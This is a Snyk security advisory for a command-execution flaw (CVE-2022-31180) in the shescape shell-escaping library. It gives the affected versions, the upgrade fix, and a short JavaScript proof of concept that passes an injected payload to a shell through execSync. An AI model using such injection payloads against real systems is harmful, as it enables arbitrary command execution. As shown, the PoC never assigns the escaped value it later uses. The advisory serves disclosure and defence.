Arbitrary Command Execution Affecting shescape package, versions >=1.4.0 <1.5.8
Threat Intelligence
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JS-SHESCAPE-2952704
- published 17 Jul 2022
- disclosed 15 Jul 2022
- credit Unknown
Introduced: 15 Jul 2022
CVE-2022-31180 Open this link in a new tabHow to fix?
Upgrade shescape to version 1.5.8 or higher.
Overview
shescape is a simple shell escape library
Affected versions of this package are vulnerable to Arbitrary Command Execution for systems using the escape or escapeAll functions with the interpolation option set to true, on Bash, Dash, Zsh, or Powershell shells. Under those conditions, an attacker can cause arbitrary commands to be executed by including them after certain whitespace characters in their input.
NOTE:
The undesirable behavior is mitigated partially in version 1.5.7 but fully removed in version 1.5.8. It can also be worked around by eliminating use of the interpolation: true option.
PoC:
import cp from "node:child_process";
import * as shescape from "shescape";
// 1. Prerequisites
const options = {
shell: "bash",
// Or
shell: "dash",
// Or
shell: "powershell.exe",
// Or
shell: "zsh",
// Or
shell: undefined, // Only if the default shell is one of the affected shells.
};
// 2. Attack (one of multiple)
const payload = "foo #bar";
// 3. Usage
let escapedPayload;
shescape.escape(payload, { interpolation: true });
// Or
shescape.escapeAll(payload, { interpolation: true });
cp.execSync(`echo Hello ${escapedPayload}!`, options);
// _Output depends on the shell being used_